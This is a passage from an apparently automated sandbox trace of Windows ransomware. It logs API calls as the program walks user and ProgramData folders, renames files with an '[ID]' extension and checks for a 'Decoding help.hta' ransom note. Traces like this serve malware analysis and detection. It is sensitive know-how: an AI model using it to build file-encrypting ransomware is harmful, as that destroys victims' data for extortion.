Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab" [0057.607] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab.[ID]g9uZrLhJaygpwRm1[ID]" [0057.607] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\cab1.cab"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\cab1.cab.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.419] FindNextFileW (in: hFindFile=0x671f70, lpFindFileData=0xef8fd30 | out: lpFindFileData=0xef8fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4374a500, ftCreationTime.dwHighDateTime=0x1ced4da, ftLastAccessTime.dwLowDateTime=0x4374a500, ftLastAccessTime.dwHighDateTime=0x1ced4da, ftLastWriteTime.dwLowDateTime=0x4374a500, ftLastWriteTime.dwHighDateTime=0x1ced4da, nFileSizeHigh=0x0, nFileSizeLow=0x25000, dwReserved0=0x0, dwReserved1=0x0, cFileName="vc_runtimeAdditional_x64.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 1 [0059.419] lstrcpyW (in: lpString1=0x2ab190a0, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\*.*" [0059.419] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\*.*") returned 121 [0059.419] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\Decoding help.hta") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\Decoding help.hta" [0059.419] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\Decoding help.hta" (normalized: "c:\\programdata\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\decoding help.hta")) returned 0x1 [0059.419] lstrcmpiW (lpString1="Decoding help.hta", lpString2="vc_runtimeAdditional_x64.msi") returned -1 [0059.419] lstrlenW (lpString="vc_runtimeAdditional_x64.msi") returned 28 [0059.419] lstrcmpiW (lpString1="[ID]", lpString2=".msi") returned 1 [0059.419] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\*.*" [0059.419] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\*.*") returned 121 [0059.419] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\", lpString2="vc_runtimeAdditional_x64.msi" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi" [0059.420] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi" [0059.420] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi.[ID]g9uZrLhJaygpwRm1[ID]" [0059.420] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi" (normalized: "c:\\programdata\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi.[id]g9uzrlhjaygpwrm1[id]")) Thread: id = 659 os_tid = 0xe90 [0049.131] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP8_1\\*.*", lpFindFileData=0xf48fd30 | out: lpFindFileData=0xf48fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e2df0 [0051.510] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0051.510] FindNextFileW (in: hFindFile=0x5e2df0, lpFindFileData=0xf48fd30 | out: lpFindFileData=0xf48fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0051.510] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0051.510] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0051.510] FindNextFileW (in: hFindFile=0x5e2df0, lpFindFileData=0xf48fd30 | out: lpFindFileData=0xf48fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0051.510] FindClose (in: hFindFile=0x5e2df0 | out: hFindFile=0x5e2df0) returned 1 Thread: id = 660 os_tid = 0xe94 [0049.150] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP9_0\\*.*", lpFindFileData=0xb28fd30 | out: lpFindFileData=0xb28fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e2df0 [0051.510] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0051.510] FindNextFileW (in: hFindFile=0x5e2df0, lpFindFileData=0xb28fd30 | out: lpFindFileData=0xb28fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0051.510] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0051.510] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0051.510] FindNextFileW (in: hFindFile=0x5e2df0, lpFindFileData=0xb28fd30 | out: lpFindFileData=0xb28fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0051.510] FindClose (in: hFindFile=0x5e2df0 | out: hFindFile=0x5e2df0) returned 1 Thread: id = 661 os_tid = 0xe98 [0049.157] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\*.*", lpFindFileData=0x1185fd30 | out: lpFindFileData=0x1185fd30*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x5616fca0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x5616fca0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x671c70 [0050.608] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0050.609] FindNextFileW (in: hFindFile=0x671c70, lpFindFileData=0x1185fd30 | out: lpFindFileData=0x1185fd30*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x5616fca0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x5616fca0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0050.609] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0050.609] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0050.609] FindNextFileW (in: hFindFile=0x671c70, lpFindFileData=0x1185fd30 | out: lpFindFileData=0x1185fd30*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x510b3550, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x510b3550, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DOMStore", cAlternateFileName="")) returned 1 [0050.609] lstrcmpW (lpString1=".", lpString2="DOMStore") returned -1 [0050.609] lstrcmpW (lpString1="..", lpString2="DOMStore") returned -1 [0050.609] lstrcmpiW (lpString1="windows", lpString2="DOMStore") returned 1 [0050.611] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\*.*" [0050.611] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\*.*") returned 82 [0050.611] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\", lpString2="DOMStore" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore" [0050.611] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\*.*" [0050.611] GlobalMemoryStatus (in: lpBuffer=0x1185fd10 | out: lpBuffer=0x1185fd10) [0050.611] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x252cff20, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x6a8 [0050.745] CloseHandle (hObject=0x6a8) returned 1 [0050.745] FindNextFileW (in: hFindFile=0x671c70, lpFindFileData=0x1185fd30 | out: lpFindFileData=0x1185fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5616fca0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x2bf7e690, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0x2bf7e690, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Services", cAlternateFileName="")) returned 1 [0050.745] lstrcmpW (lpString1=".", lpString2="Services") returned -1 [0050.745] lstrcmpW (lpString1="..", lpString2="Services") returned -1 [0050.745] lstrcmpiW (lpString1="windows", lpString2="Services") returned 1 [0050.747] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\*.*" [0050.748] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\*.*") returned 82 [0050.748] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\", lpString2="Services" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services" [0050.748] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services\\*.*" [0050.748] GlobalMemoryStatus (in: lpBuffer=0x1185fd10 | out: lpBuffer=0x1185fd10) [0050.748] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x25348128, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x6a8 [0050.768] CloseHandle (hObject=0x6a8) returned 1 [0050.768] FindNextFileW (in: hFindFile=0x671c70, lpFindFileData=0x1185fd30 | out: lpFindFileData=0x1185fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5616fca0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x2bf7e690, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0x2bf7e690, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Services", cAlternateFileName="")) returned 0 [0050.768] FindClose (in: hFindFile=0x671c70 | out: hFindFile=0x671c70) returned 1 Thread: id = 662 os_tid = 0xebc [0054.438] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*.*", lpFindFileData=0x1289fd30 | out: lpFindFileData=0x1289fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1d91b669, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1d91b669, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a5930 [0056.423] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0056.423] FindNextFileW (in: hFindFile=0x5a5930, lpFindFileData=0x1289fd30 | out: lpFindFileData=0x1289fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1d91b669, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1d91b669, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.423] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0056.423] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0056.423] FindNextFileW (in: hFindFile=0x5a5930, lpFindFileData=0x1289fd30 | out: lpFindFileData=0x1289fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d91b669, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22f23962, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1d91b669, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0056.423] lstrcmpW (lpString1=".", lpString2="en-US") returned -1 [0056.423] lstrcmpW (lpString1="..", lpString2="en-US") returned -1 [0056.423] lstrcmpiW (lpString1="windows", lpString2="en-US") returned 1 [0056.680] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*.*" [0056.680] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*.*") returned 93 [0056.680] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\", lpString2="en-US" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US" [0056.680] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\*.*" [0056.680] GlobalMemoryStatus (in: lpBuffer=0x1289fd10 | out: lpBuffer=0x1289fd10) [0056.680] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x2ab210a8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x7ac [0056.687] CloseHandle (hObject=0x7ac) returned 1 [0056.688] FindNextFileW (in: hFindFile=0x5a5930, lpFindFileData=0x1289fd30 | out: lpFindFileData=0x1289fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2c7f9e6, ftCreationTime.dwHighDateTime=0x1ca0407, ftLastAccessTime.dwLowDateTime=0xd2c7f9e6, ftLastAccessTime.dwHighDateTime=0x1ca0407, ftLastWriteTime.dwLowDateTime=0x7c0e93d7, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xd0a3, dwReserved0=0x0, dwReserved1=0x0, cFileName="folder.ico", cAlternateFileName="")) returned 1 [0056.690] lstrcpyW (in: lpString1=0x2ab51178, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*.*" [0056.690] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*.*") returned 93 [0056.690] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\Decoding help.hta" [0056.690] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\Decoding help.hta" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\decoding help.hta")) returned 0x20 Thread: id = 663 os_tid = 0xea0 [0054.439] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\*.*", lpFindFileData=0x11adfd30 | out: lpFindFileData=0x11adfd30*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x23a43389, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e2db0 [0054.439] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0054.439] FindNextFileW (in: hFindFile=0x5e2db0, lpFindFileData=0x11adfd30 | out: lpFindFileData=0x11adfd30*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x23a43389, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.439] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0054.439] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0054.439] FindNextFileW (in: hFindFile=0x5e2db0, lpFindFileData=0x11adfd30 | out: lpFindFileData=0x11adfd30*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, 